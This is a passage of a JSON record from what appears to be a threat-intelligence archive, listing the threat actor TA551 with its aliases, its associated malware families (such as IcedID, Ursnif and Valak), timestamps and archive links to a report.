			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434592,
	"ts_updated_at": 1775792243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.pdf",
		"text": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.txt",
		"img": "https://archive.orkl.eu/d21d996d312effb0bcb3a5d02c443a98940ccb24.jpg"
	}
}